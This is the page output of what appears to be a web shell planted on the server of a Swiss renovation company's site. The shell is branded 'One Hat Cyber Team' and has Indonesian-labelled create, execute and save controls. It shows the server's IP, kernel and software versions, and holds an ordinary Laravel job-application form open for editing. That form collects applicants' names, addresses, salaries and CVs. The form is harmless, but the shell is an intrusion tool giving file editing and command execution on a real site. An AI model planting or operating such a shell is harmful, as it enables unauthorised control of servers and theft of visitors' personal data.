⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.1
Server IP:
185.238.29.86
Server:
Linux server2 6.8.12-6-pve #1 SMP PREEMPT_DYNAMIC PMX 6.8.12-6 (2024-12-19T19:05Z) x86_64
Server Software:
nginx/1.18.0
PHP Version:
8.1.31
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
bosrenovationen.ch
/
resources
/
views
/
pages
/
Edit File: job_apply.blade.php
@extends('layouts.app') @section('content') <div class="page-banner" style="background-image: url({{ asset('uploads/'.$g_setting->banner_job_application) }})"> <div class="bg-page"></div> <div class="text"> <h1>{{ APPLY_FOR_COLON }} {{ $job_detail->job_title }}</h1> <nav aria-label="breadcrumb"> <ol class="breadcrumb justify-content-center"> <li class="breadcrumb-item"><a href="{{ url('/') }}">{{ HOME }}</a></li> <li class="breadcrumb-item"><a href="{{ route('front.career') }}">{{ CAREER }}</a></li> <li class="breadcrumb-item active" aria-current="page">{{ $job_detail->job_title }}</li> </ol> </nav> </div> </div> <div class="page-content"> <div class="container"> <div class="row"> <div class="col-md-12"> <div class="career-sidebar"> <div class="widget"> <h3>{{ APPLY_IN_THIS_JOB }}</h3> <div class="type-3"> <form action="{{ route('front.apply_form') }}" method="post" enctype="multipart/form-data"> @csrf <input type="hidden" name="job_id" value="{{ $job_detail->id }}"> <div class="row"> <div class="col"> <div class="form-group"> <label>{{ FIRST_NAME }} *</label> <input type="text" class="form-control" name="applicant_first_name" value="{{ old('applicant_first_name') }}"> </div> </div> <div class="col"> <div class="form-group"> <label>{{ LAST_NAME }} *</label> <input type="text" class="form-control" name="applicant_last_name" value="{{ old('applicant_last_name') }}"> </div> </div> </div> <div class="row"> <div class="col"> <div class="form-group"> <label>{{ EMAIL_ADDRESS }} *</label> <input type="email" class="form-control" name="applicant_email" value="{{ old('applicant_email') }}"> </div> </div> <div class="col"> <div class="form-group"> <label>{{ PHONE }} *</label> <input type="text" class="form-control" name="applicant_phone" value="{{ old('applicant_phone') }}"> </div> </div> </div> <div class="row"> <div class="col"> <div class="form-group"> <label>{{ COUNTRY }} *</label> <input type="text" class="form-control" name="applicant_country" value="{{ old('applicant_country') }}"> </div> </div> <div class="col"> <div class="form-group"> <label>{{ STATE }} *</label> <input type="text" class="form-control" name="applicant_state" value="{{ old('applicant_state') }}"> </div> </div> </div> <div class="row"> <div class="col"> <div class="form-group"> <label>{{ STREET }} *</label> <input type="text" class="form-control" name="applicant_street" value="{{ old('applicant_street') }}"> </div> </div> <div class="col"> <div class="form-group"> <label>{{ CITY }} *</label> <input type="text" class="form-control" name="applicant_city" value="{{ old('applicant_city') }}"> </div> </div> </div> <div class="row"> <div class="col"> <div class="form-group"> <label>{{ ZIP_CODE }} *</label> <input type="text" class="form-control" name="applicant_zip_code" value="{{ old('applicant_zip_code') }}"> </div> </div> <div class="col"> <div class="form-group"> <label>{{ EXPECTED_SALARY }} *</label> <input type="text" class="form-control" name="applicant_expected_salary" value="{{ old('applicant_expected_salary') }}"> </div> </div> </div> <div class="form-group"> <label>{{ COVER_LETTER }} *</label> <textarea name="applicant_cover_letter" class="form-control h-300" cols="30" rows="10">{{ old('applicant_cover_letter') }}</textarea> </div> <div class="form-group"> <label>{{ ATTACH_RESUME }} *</label><br> <input type="file" name="applicant_cv"><br> <span class="text-danger">({{ DOC_DOCX_PDF_ALLOWED }})</span> </div> @if($g_setting->google_recaptcha_status == 'Show') <div class="form-group"> <div class="g-recaptcha" data-sitekey="{{ $g_setting->google_recaptcha_site_key }}"></div> </div> @endif <div class="form-group"> <div> <div class="custom-control custom-checkbox"> <input type="checkbox" class="custom-control-input" id="customCheck1"> <label class="custom-control-label" for="customCheck1">{{ AGREE_TEXT }}</label> </div> </div> </div> <button type="submit" class="btn btn-primary mt_10 button_final" disabled>{{ SUBMIT_APPLICATION }}</button> </form> </div> </div> </div> </div> </div> </div> </div> <script> $("#customCheck1").on('change',function() { if(this.checked) { $(".button_final").prop('disabled', false); } else { $(".button_final").prop('disabled', true); } }); </script> @endsection
Simpan